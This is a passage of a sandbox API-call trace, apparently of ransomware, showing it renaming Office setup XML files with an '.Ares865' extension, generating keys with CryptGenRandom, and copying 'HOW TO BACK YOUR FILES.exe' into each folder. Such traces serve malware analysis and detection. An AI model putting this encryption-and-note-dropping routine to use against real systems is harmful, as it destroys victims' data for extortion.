ftLastWriteTime.dwLowDateTime=0x5ed13fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.024] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.025] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.025] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.Ares865") returned 120 [0076.025] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.ares865"), dwFlags=0x1) returned 1 [0076.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.026] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1450) returned 1 [0076.026] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.027] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.027] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.029] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.029] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.030] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.030] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.Ares865") returned 113 [0076.030] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.032] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1608) returned 1 [0076.032] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.032] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.033] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.035] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.036] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.036] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.036] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR" [0076.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f388 | out: hHeap=0x2b0000) returned 1 [0076.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0076.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR") returned 88 [0076.036] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR" [0076.036] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.036] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.042] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.042] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ed3a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ed3a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.042] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.042] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.042] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.Ares865") returned 111 [0076.042] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.ares865"), dwFlags=0x1) returned 1 [0076.043] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16852) returned 1 [0076.043] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.044] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.044] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.053] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.054] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.054] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.055] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.Ares865") returned 106 [0076.055] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.057] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=31094) returned 1 [0076.057] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.058] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.058] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.060] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.061] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.061] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.062] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us" [0076.062] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319608 | out: hHeap=0x2b0000) returned 1 [0076.062] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0076.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us") returned 94 [0076.062] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us" [0076.062] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.062] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.068] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.068] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ed863c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ed863c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.068] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.068] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.069] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.Ares865") returned 115 [0076.069] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.ares865"), dwFlags=0x1) returned 1 [0076.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.072] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=811) returned 1 [0076.072] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.073] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.073] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.075] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.079] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.079] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.080] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.Ares865") returned 112 [0076.080] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.081] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5884) returned 1 [0076.081] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.082] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.082] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.084] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.085] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.085] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.085] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr" [0076.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f2c8 | out: hHeap=0x2b0000) returned 1 [0076.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0076.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr") returned 88 [0076.085] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr" [0076.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.090] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.090] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edac520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5edac520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.090] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.090] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.090] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.Ares865") returned 106 [0076.090] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.ares865"), dwFlags=0x1) returned 1 [0076.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.091] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1458) returned 1 [0076.091] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.092] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.092] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.112] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.112] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.112] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.113] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es" [0076.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f208 | out: hHeap=0x2b0000) returned 1 [0076.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0076.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es") returned 88 [0076.113] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es" [0076.113] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.113] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.119] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.119] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edf87e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5edf87e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.119] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.119] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.120] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.Ares865") returned 106 [0076.120] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.ares865"), dwFlags=0x1) returned 1 [0076.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.121] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1457) returned 1 [0076.121] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.122] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: 